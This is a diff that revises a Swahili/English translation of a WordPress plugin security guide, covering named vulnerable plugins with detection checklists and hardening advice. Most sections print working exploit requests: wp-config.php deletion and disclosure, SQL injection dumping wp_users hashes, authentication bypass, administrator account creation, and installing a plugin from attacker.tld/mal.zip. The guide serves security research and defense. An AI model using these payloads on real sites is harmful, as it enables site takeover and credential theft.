@@ -438,33 +438,33 @@ Masuala yaliyotokana na kipande hiki: * **Ufikiaji bila uthibitisho** – hook ya `wp_ajax_nopriv_` imejisajili. * **Hakuna ukaguzi wa nonce / capability** – mgeni yeyote anaweza kufikia endpoint. -* **Hakuna kusafishwa kwa path** – mfuatano uliodhibitiwa na mtumiaji `fontfamily` unaunganishwa kwenye njia ya filesystem bila kuchujwa, kuruhusu `../../` traversal ya kawaida. +* **Hakuna kusafishwa kwa njia** – kamba inayodhibitiwa na mtumiaji `fontfamily` inaunganishwa kwenye njia ya filesystem bila kuchujwa, ikiruhusu classic `../../` traversal. #### Utekelezaji -Mshambuliaji anaweza kufuta faili yoyote au saraka **chini ya saraka ya msingi ya uploads** (kwa kawaida `/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST: +Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kawaida `/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST: ```bash curl -X POST https://victim.com/wp-admin/admin-ajax.php \ -d 'action=litho_remove_font_family_action_data' \ -d 'fontfamily=../../../../wp-config.php' ``` -Because `wp-config.php` lives outside *uploads*, four `../` sequences are enough on a default installation. Deleting `wp-config.php` forces WordPress into the *installation wizard* on the next visit, enabling a full site take-over (the attacker merely supplies a new DB configuration and creates an admin user). +Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye usakinishaji wa kawaida. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *msaidizi wa usanidi* kwenye ziara inayofuata, na kuwezesha kuchukua tovuti kwa ukamilifu (mshambuliaji anatolewa tu usanidi mpya wa DB na kuunda mtumiaji admin). -Malengo mengine yenye athari ni faili za `.php` za plugin/theme (kuvunja plugin za usalama) au sheria za `.htaccess`. +Other impactful targets include plugin/theme `.php` files (to break security plugins) or `.htaccess` rules. 
#### Detection checklist -* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.). -* Kuambatanisha input ya mtumiaji isiyosafishwa ndani ya paths (tazama `$_POST`, `$_GET`, `$_REQUEST`). -* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`. +* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, etc.). +* Kuunganisha maingizo ya mtumiaji ambayo hayaja safishwa katika paths (tazama `$_POST`, `$_GET`, `$_REQUEST`). +* Ukosefu wa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`. --- -### Kuinua mamlaka kupitia urejeshaji wa role zilizobaki na kukosekana kwa idhini (ASE "View Admin as Role") +### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") -Mengi ya plugins hutekeleza kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) za awali katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu vigezo vya ombi (mf., `$_REQUEST['reset-for']`) na orodha inayodumishwa na plugin bila kuangalia capabilities na nonce halali, hii inageuka kuwa kuinua mamlaka kwa mtazamo wima. +Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restoration path relies only on request parameters (e.g., `$_REQUEST['reset-for']`) and a plugin-maintained list without checking capabilities and a valid nonce, this becomes a vertical privilege escalation. -Mfano wa maisha halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). 
Tawi la reset liliurejesha role kulingana na `reset-for=` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uhakiki wa nonce kabla ya kuondoa role za sasa na kuziwekea tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`: +Mfano wa dunia halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliurejesha role kulingana na `reset-for=` ikiwa jina la mtumiaji lilitokea katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uthibitisho wa nonce kabla ya kuondoa role za sasa na kuongeza tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`: ```php // Simplified vulnerable pattern if ( isset( $_REQUEST['reset-for'] ) ) { 
@@ -479,13 +479,13 @@ foreach ( $orig as $r ) { $u->add_role( $r ); } } } ``` -Kwa nini inaweza kutumika +Why it’s exploitable -- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa seva. -- Ikiwa mtumiaji alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na baadaye alishushwa hadhi, anaweza kuzirejesha kwa kufikia reset path. -- Katika baadhi ya deployments, mtumiaji yeyote aliyethibitishwa angeweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika). +- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila uthibitisho upande wa seva. +- Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipunguzwa, anaweza kuzirejesha kwa kufikia reset path. +- Katika baadhi ya usanikishaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika). -Matumizi ya udhaifu (mfano) +Utekelezaji wa shambulio (mfano) ```bash # While logged in as the downgraded user (or any auth user able to trigger the code path), # hit any route that executes the role-switcher logic and include the reset parameter. 
@@ -493,23 +493,23 @@ Matumizi ya udhaifu (mfano) curl -s -k -b 'wordpress_logged_in=...' \ 'https://victim.example/wp-admin/?reset-for=' ``` -On vulnerable builds this removes current roles and re-adds the saved original roles (e.g., `administrator`), effectively escalating privileges. +Katika builds zilizo hatarini, hii inaondoa current roles na kuzirudisha tena saved original roles (mfano, `administrator`), na kwa ufanisi escalating privileges. -Orodha ya kugundua +Detection checklist -- Angalia vipengele vya kubadilisha role vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`). -- Tambua njia za reseti/urejesho ambazo: - - Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`. - - Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`. - - Rudisha idhini kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika. +- Tazama role-switching features ambazo zinaweka “original roles” ndani ya user meta (mfano, `_asenha_view_admin_as_original_roles`). +- Tambua reset/restore paths ambazo: +- Kusoma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`. +- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`. +- Kuruhusu kwa msingi wa plugin option array (mfano, `viewing_admin_as_role_are`) badala ya capabilities za mhusika. --- -### Kuongezeka kwa ruhusa kwa watumiaji wasioathibitishwa kupitia cookie‑trusted user switching kwenye hook ya umma `init` (Service Finder “sf-booking”) +### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”) -Baadhi ya plugins huunganisha user-switching helpers kwenye hook ya umma `init` na hutumia utambulisho kutoka kwa cookie inayodhibitiwa na mteja. 
Ikiwa msimbo unaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyetambulishwa anaweza kulazimisha login kama user ID yeyote. +Baadhi ya plugins huhusisha user-switching helpers na public `init` hook na hupata utambulisho kutoka kwa cookie inayoendeshwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiye na uthibitisho anaweza kulazimisha login kama arbitrary user ID. -Mfano wa kawaida wenye udhaifu (umeshindwa kidogo kutoka Service Finder Bookings ≤ 6.1): +Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1): ```php function service_finder_submit_user_form(){ if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) { @@ -538,11 +538,11 @@ wp_die('Original user not found.'); wp_die('No original user found to switch back to.'); } ``` -Why it’s exploitable +Kwa nini inaweza kutumiwa -- Hook ya `init` ya umma inafanya handler ipatikane kwa unauthenticated users (no `is_user_logged_in()` guard). -- Kitambulisho kinatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`). -- Simu ya moja kwa moja kwa `wp_set_auth_cookie($uid)` inamwingiza muombaji kama mtumiaji huyo bila capability/nonce checks. +- Hook ya umma `init` inafanya handler upatikane kwa watumiaji wasiothibitishwa (hakuna kinga ya `is_user_logged_in()`). +- Utambulisho unatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`). +- Kuitwa moja kwa moja kwa `wp_set_auth_cookie($uid)` hufanya mwombaji aingie kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce. Exploitation (unauthenticated) ```http 
@@ -554,32 +554,32 @@ Connection: close ``` --- -### Mambo ya WAF kwa CVEs za WordPress/plugin +### WAF considerations for WordPress/plugin CVEs -WAF za generic za edge/server zimeelekezwa kwa mifumo pana (SQLi, XSS, LFI). Matatizo mengi ya high‑impact ya WordPress/plugin ni hitilafu maalum za logic/auth za application ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine itakapotambua routes za WordPress na semantics za plugin. +WAFs za edge/server za kawaida zimewekwa kwa mifumo pana (SQLi, XSS, LFI). Mengi ya mdudu wa WordPress/plugin wenye athari kubwa ni bug za mantiki/uthibitisho za programu ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine inafahamu routes za WordPress na semantics za plugin. -Vidokezo vya kushambulia +Offensive notes - Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json//`, custom file handlers, shortcodes. -- Tumia njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi zinafanikiwa bila obfuscation. +- Anzisha kwa njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Payloads za default mara nyingi hufanikiwa bila kufichwa. - Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect. -Vidokezo vya ulinzi +Defensive notes -- Usitegemee saini za generic za WAF kulinda CVEs za plugin. Tekeleza virtual patches maalum za vulnerability kwenye application-layer au sasisha haraka. -- Tumia positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya negative regex filters. +- Usitegemee saini za WAF za kawaida ili kulinda plugin CVEs. Tekeleza virtual patches maalum kwa tabaka la application kwa ajili ya hitilafu au sasisha haraka. 
+- Nenda kwa positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya vichujio hasi vya regex. -## Ulinzi wa WordPress +## WordPress Protection -### Sasisho za kawaida +### Regular Updates -Hakikisha WordPress, plugins, na themes viko updated. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php: +Hakikisha WordPress, plugins, na themes zimesasishwa. Pia thibitisha kwamba sasisho za moja kwa moja zimewezeshwa katika wp-config.php: ```bash define( 'WP_AUTO_UPDATE_CORE', true ); add_filter( 'auto_update_plugin', '__return_true' ); add_filter( 'auto_update_theme', '__return_true' ); ``` -Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**. +Pia, **wasakinishe tu WordPress plugins na themes zinazoweza kuaminiwa**. ### Plugins za Usalama 
@@ -590,15 +590,15 @@ Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**. ### **Mapendekezo Mengine** - Ondoa mtumiaji wa chaguo-msingi **admin** -- Tumia **nywila zenye nguvu** na **2FA** -- Kila mara **kagua** **ruhusa** za watumiaji +- Tumia **nenosiri imara** na **2FA** +- Mara kwa mara **kagua** **idhinishaji** za watumiaji - **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force -- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum. +- Badili jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani za IP maalum. -### SQL Injection isiyothibitishwa kupitia uidhinishaji duni (WP Job Portal <= 2.3.2) +### SQL Injection isiyo na uthibitisho kupitia uhalalishaji usio wa kutosha (WP Job Portal <= 2.3.2) -Plugin ya recruitment ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye udhaifu ndani ya `modules/category/model.php::validateFormData()`: +Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye hatari ndani ya `modules/category/model.php::validateFormData()`: ```php $category = WPJOBPORTALrequest::getVar('parentid'); $inquery = ' '; 
@@ -610,17 +610,17 @@ $query = "SELECT max(ordering)+1 AS maxordering FROM " ``` Masuala yaliyotokana na kipande hiki cha msimbo: -1. **Unsanitised user input** – `parentid` inatoka moja kwa moja kutoka kwenye ombi la HTTP. -2. **String concatenation inside the WHERE clause** – hakuna `is_numeric()` / `esc_sql()` / prepared statement. -3. **Unauthenticated reachability** – ingawa action inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuipata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`. +1. **Ingizo la mtumiaji lisilosafishwa** – `parentid` linaelekezwa moja kwa moja kutoka kwa ombi la HTTP. +2. **String concatenation ndani ya WHERE clause** – hakuna `is_numeric()` / `esc_sql()` / prepared statement. +3. **Ufikiaji bila uthibitisho** – ingawa hatua inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuupata kutoka ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`. -#### Exploitation +#### Utekelezaji -1. Chukua nonce mpya: +1. Pata nonce mpya: ```bash curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4 ``` -2. Weka SQL yoyote kwa kutumia vibaya `parentid`: +2. Ingiza arbitrary SQL kwa kutumia `parentid`: ```bash curl -X POST https://victim.com/wp-admin/admin-post.php \ -d 'task=savecategory' \ 
@@ -628,20 +628,20 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \ -d 'parentid=0 OR 1=1-- -' \ -d 'cat_title=pwn' -d 'id=' ``` -Jibu linafunua matokeo ya query iliyotiwa au linabadilisha database, kuthibitisha SQLi. +Jibu linafunua matokeo ya query iliyotiwa au hubadilisha database, kuthibitisha SQLi. -### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2) +### Ufikiaji bila uthibitisho Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2) -Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **any file on disk** kupitia path traversal. Sink dhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`: +Kazi nyingine, **downloadcustomfile**, iliruhusu wageni kupakua **faili yoyote kwenye diski** kupitia path traversal. Sink yenye udhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`: ```php $file = $path . '/' . $file_name; ... echo $wp_filesystem->get_contents($file); // raw file output ``` -`$file_name` inayodhibitiwa na mshambuliaji na inachanganywa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka ukurasa wa resume. +`$file_name` inadhibitiwa na mshambulizi na imeunganishwa **bila kusafishwa**. Mara nyingine, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka kwenye ukurasa wa resume. -#### Utekelezaji +#### Utekelezaji wa shambulio ```bash curl -G https://victim.com/wp-admin/admin-post.php \ --data-urlencode 'task=downloadcustomfile' \ 
@@ -650,13 +650,13 @@ curl -G https://victim.com/wp-admin/admin-post.php \ --data-urlencode 'entity_id=1' \ --data-urlencode 'file_name=../../../wp-config.php' ``` -Seva inarejesha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys. +Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys. -## Uchukuzi wa akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9) +## Kuchukua akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9) -Mandhari/plugini nyingi huja na "social login" helpers zilizoonyeshwa kupitia admin-ajax.php. Ikiwa action ya AJAX bila uthibitisho (wp_ajax_nopriv_...) itaamini client-supplied identifiers wakati provider data inakosekana na kisha itaita wp_set_auth_cookie(), hili linakuwa full authentication bypass. +Mada/plugini nyingi zinakuja na "social login" helpers zilizofunguliwa kupitia admin-ajax.php. Ikiwa action ya AJAX isiyothibitishwa (wp_ajax_nopriv_...) inamwamini kitambulisho kilichotolewa na mteja wakati data ya provider haipo na kisha inaitisha wp_set_auth_cookie(), hii inakuwa bypass kamili ya uthibitisho. -Mfano wa kawaida wa muundo mbovu (umewekwa kwa ufupi) +Mfano wa kawaida wa muundo mbovu (imefupishwa) ```php public function check_login() { // ... request parsing ... 
@@ -687,15 +687,15 @@ wp_send_json(['status' => 'not_user']); ``` Kwa nini inaweza kutumika -- Unauthenticated reachability via admin-ajax.php (wp_ajax_nopriv_… action). +- Inafikiwa bila uthibitisho kupitia admin-ajax.php (wp_ajax_nopriv_… action). - Hakuna ukaguzi wa nonce/capability kabla ya mabadiliko ya hali. -- Uthibitisho wa OAuth/OpenID provider umekosekana; default branch inakubali attacker input. -- get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamtambulisha muomba kama anuani yoyote ya barua pepe iliyopo. +- Hakuna uthibitisho wa OAuth/OpenID provider; tawi la default linakubali pembejeo ya mdukuji. +- get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamthibitisha muombaji kama anwani yoyote ya barua pepe iliyopo. -Exploitation (unauthenticated) +Utekelezaji (bila uthibitisho) -- Mahitaji ya awali: attacker anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia anwani halali ya barua pepe ya mtumiaji. -- Weka provider kuwa thamani isiyoungwa mkono (au uiache) ili kufikia default branch na upitishie id=. +- Mahitaji: mdukuji anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia barua pepe ya mtumiaji halali. +- Weka provider kuwa thamani isiyoungwa mkono (au uiachie) ili kufikia tawi la default na kupitisha id=. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: victim.tld 
@@ -708,41 +708,41 @@ action=&using=bogus&id=admin%40example.com curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \ -d "action=&using=bogus&id=admin%40example.com" ``` -Viashiria vilivyotarajiwa vya mafanikio +Expected success indicators - HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}. - Set-Cookie: wordpress_logged_in_* for the victim user; subsequent requests are authenticated. -Kupata jina la action +Finding the action name - Inspect the theme/plugin for add_action('wp_ajax_nopriv_...', '...') registrations in social login code (e.g., framework/add-ons/social-login/class-social-login.php). - Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers. -Orodha ya kugundua +Detection checklist - Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=. - 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent. -Kuimarisha +Hardening -- Usitafsiri utambulisho kutoka kwa pembejeo ya client. Kubali tu emails/IDs zinazoanzishwa na provider token/ID iliyothibitishwa. +- Do not derive identity from client input. Only accept emails/IDs originating from a validated provider token/ID. - Require CSRF nonces and capability checks even for login helpers; avoid registering wp_ajax_nopriv_ unless strictly necessary. -- Thibitisha na hakiki majibu ya OAuth/OIDC upande wa server; kataa providers zisizopo au zisizo halali (usiwe na fallback kwa POST id). -- Fikiria kuzima kwa muda social login au kufanya virtual patching upande wa edge (zuia action iliyo dhaifu) hadi itakaposahihishwa. +- Validate and verify OAuth/OIDC responses server-side; reject missing/invalid providers (no fallback to POST id). +- Consider temporarily disabling social login or virtually patching at the edge (block the vulnerable action) until fixed. 
-Tabia iliyorekebishwa (Jobmonster 4.8.0) +Patched behaviour (Jobmonster 4.8.0) - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). -## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) +## Kupandishwa kwa ruhusa bila uthibitisho via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) -Baadhi ya plugins zinaonyesha REST endpoints zinazotengeneza reusable “connection keys” au tokens bila kuthibitisha uwezo wa aliyeomba. Ikiwa route inathibitisha tu kwa sifa inayoweza kukisia (mfano, username) na haifungishi key kwa user/session yenye capability checks, mshambuliaji yeyote asiye authenticated anaweza kutengeneza key na kuita vitendo vyenye haki za juu (kuunda account ya admin, plugin actions → RCE). +Baadhi ya plugins huweka wazi REST endpoints zinazotengeneza reusable "connection keys" au tokens bila kuthibitisha uwezo wa mtaarifu. Ikiwa route inafanya authentication kwa sifa inayoweza kubahatishwa tu (mfano, username) na haitoi ufunganaji wa key kwa user/session kwa checks za capability, mshambuliaji asiyeuthibitisha anaweza kutengeneza key na kuiita kwa hatua zenye ruhusa (admin account creation, plugin actions → RCE). - Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection - Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback - Impact: full takeover by chaining the minted key to internal privileged actions -PoC – tengeneza connection key na uitumie +PoC – mint a connection key and use it ```bash # 1) Obtain key (unauthenticated). Exact payload varies per plugin curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ 
@@ -757,53 +757,53 @@ curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' ``` Kwa nini inaweza kutumiwa -- REST route nyeti inalindwa tu na uthibitisho wa utambulisho wa entropi ya chini (username) au permission_callback inayokosekana -- Hakuna utekelezaji wa capability; funguo iliyotengenezwa inakubaliwa kama bypass ya jumla +- Sensitive REST route ilindwa tu na ushahidi wa utambulisho wenye entropy ndogo (username) au kukosekana kwa permission_callback +- Hakuna utekelezaji wa capability; minted key inakubaliwa kama njia ya kupita bila vizuizi -Orodha ya utambuzi -- Grep code ya plugin kwa register_rest_route(..., [ 'permission_callback' => '__return_true' ]) -- Route yoyote inayotoa tokens/keys msingi kwenye utambulisho uliowezwa na ombi (username/email) bila kuhusisha na mtumiaji aliyethibitishwa au capability -- Angalia routes zilizofuata zinazokubali token/key iliyotengenezwa bila ukaguzi wa capability upande wa server +Detection checklist +- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) +- Route yoyote inayotoa tokens/keys kwa msingi wa identity iliyotolewa na ombi (username/email) bila kuihusisha na authenticated user au capability +- Tafuta routes zinazofuata zinazokubali minted token/key bila ukaguzi wa capability upande wa server -Kuimarisha usalama -- Kwa REST route yoyote yenye privileges: hitaji permission_callback inayotekeleza current_user_can() kwa capability inayohitajika -- Usitengeneze funguo zenye muda mrefu kutoka kwa utambulisho uliotolewa na mteja; ikiwa inahitajika, toa tokens fupi-muda, zenye uhusiano na mtumiaji baada ya authentication na ukague tena capabilities wakati wa matumizi -- Thibitisha muktadha wa mtumiaji wa mpiga wito (caller) (wp_set_current_user haitoshi peke yake) na kata maombi ambapo !is_user_logged_in() || !current_user_can() +Hardening +- Kwa route yoyote ya REST yenye 
mamlaka: weka permission_callback inayotekeleza current_user_can() kwa capability inayohitajika +- Usitengeneze (mint) long-lived keys kutoka kwa identity iliyotolewa na client; kama inahitajika, toa short-lived, user-bound tokens post-authentication na rudia ukaguzi wa capabilities wakati zinapotumika +- Thibitisha muktadha wa user wa mtumaji (wp_set_current_user is not sufficient alone) na kata maombi ambapo !is_user_logged_in() || !current_user_can() --- -## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3) +## Nonce gate misuse → ufungaji wa plugin kiholela bila uthibitisho (FunnelKit Automations ≤ 3.5.3) -Nonces zinazuia CSRF, si uthibitisho wa ruhusa. Ikiwa code itachukulia kupitishwa kwa nonce kama kibali na kisha kuruka ukaguzi wa capability kwa operesheni zenye ruhusa (mf., install/activate plugins), washambuliaji wasio na uthibitisho wanaweza kukidhi mahitaji dhaifu ya nonce na kufikia RCE kwa kusakinisha plugin backdoored au yenye udhaifu. +Nonces huzuia CSRF, sio idhini. Ikiwa code itashughulikia kupitishwa kwa nonce kama ishara ya kuendelea kisha ikaruka ukaguzi wa capability kwa operesheni zenye mamlaka (mf., install/activate plugins), washambuliaji wasiothibitishwa wanaweza kukidhi hitaji dhaifu la nonce na kufikia RCE kwa kusakinisha plugin iliyo na backdoor au yenye udhaifu. 
- Vulnerable path: plugin/install_and_activate - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes” - Impact: full compromise via arbitrary plugin install/activation -PoC (umbo hutegemea plugin; ni kwa mfano tu) +PoC (muundo unategemea plugin; mfano tu) ```bash curl -i -s -X POST https://victim.tld/wp-json//plugin/install_and_activate \ -H 'Content-Type: application/json' \ --data '{"_nonce":"","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' ``` Detection checklist -- REST/AJAX handlers zinazobadilisha plugins/themes kwa kutumia tu wp_verify_nonce()/check_admin_referer() na bila capability check -- Njia yoyote ya code inayoweka $skip_caps = true baada ya nonce validation +- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check +- Any code path that sets $skip_caps = true after nonce validation Hardening -- Daima tibu nonces kama tokeni za CSRF pekee; lazimisha capability checks bila kujali hali ya nonce -- Lazimisha current_user_can('install_plugins') na current_user_can('activate_plugins') kabla ya kufikia installer code -- Kataa ufikiaji usioathibitishwa; epuka kufichua nopriv AJAX actions kwa mifereji inayohitaji ruhusa +- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state +- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code +- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows --- -## SQLi bila uthibitisho kupitia parameter ya s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1) +## SQLi isiyothibitishwa kupitia parameta s (search) katika depicter-* actions (Depicter Slider ≤ 3.6.1) -Vitendo kadhaa za depicter-* zilitumia parameter s (search) na kuichanganya ndani ya maswali ya SQL bila parameterization. 
+Actions nyingi za depicter-* zilitumia parameta s (search) na kuiiunganisha katika SQL queries bila parameterization. -- Kigezo: s (search) -- Hitilafu: kuunganisha mnyororo wa maandishi moja kwa moja katika WHERE/LIKE clauses; hakuna prepared statements/sanitization -- Athari: database exfiltration (users, hashes), lateral movement +- Parameter: s (search) +- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization +- Impact: database exfiltration (users, hashes), lateral movement PoC ```bash 
@@ -812,38 +812,38 @@ curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ --data-urlencode 'action=depicter_search' \ --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" ``` -Detection checklist -- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL +Orodha ya ugunduzi +- Tumia grep kutafuta depicter-* action handlers na matumizi ya moja kwa moja ya $_GET['s'] au $_POST['s'] katika SQL - Pitia custom queries zinazopitishwa kwa $wpdb->get_results()/query() zinazochanganya s -Hardening -- Tumia kila mara $wpdb->prepare() au wpdb placeholders; kataa metacharacters zisizotarajiwa upande wa server -- Ongeza allowlist kali kwa s na linganisha hadi charset/length inayotarajiwa +Kuimarisha +- Daima tumia $wpdb->prepare() au wpdb placeholders; kataza metacharacters zisizotarajiwa upande wa server +- Ongeza strict allowlist kwa s na normaliza kwa charset/urefu unaotarajiwa --- -## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1) +## Unauthenticated Local File Inclusion kupitia njia ya template/file isiyotathminiwa (Kubio AI Page Builder ≤ 2.5.1) -Kukubali paths zinazosimamiwa na mshambuliaji katika parameter ya template bila normalisation/containment kunaruhusu kusoma faili za ndani yoyote, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kujumuishwa zitaletwa wakati wa runtime. +Kukubali attacker-controlled paths katika kigezo cha template bila normalization/containment kunaruhusu kusoma faili za ndani kwa hiari, na wakati mwingine code execution ikiwa faili za PHP/log zinazoweza kuingizwa zinachukuliwa wakati wa runtime. 
-- Parameter: __kubio-site-edit-iframe-classic-template -- Flaw: hakuna normalisation/allowlisting; traversal umewezekana -- Impact: ufichuaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP) +- Kigezo: __kubio-site-edit-iframe-classic-template +- Hitilafu: hakuna normalization/allowlisting; traversal inaruhusiwa +- Athari: ufichaji wa siri (wp-config.php), uwezekano wa RCE katika mazingira maalum (log poisoning, includable PHP) PoC – soma wp-config.php ```bash curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" ``` -Orodha ya utambuzi -- Any handler anayechanganya request paths ndani ya include()/require()/read sinks bila realpath() containment -- Tafuta traversal patterns (../) zinazofikia nje ya templates directory iliyokusudiwa +Detection checklist +- Handler yoyote anayechanganya request paths katika include()/require()/read sinks bila realpath() containment +- Angalia traversal patterns (../) zinazofikia nje ya intended templates directory -Uimarishaji -- Lazimisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base)) -- Normaliza input; kataa traversal sequences na absolute paths; 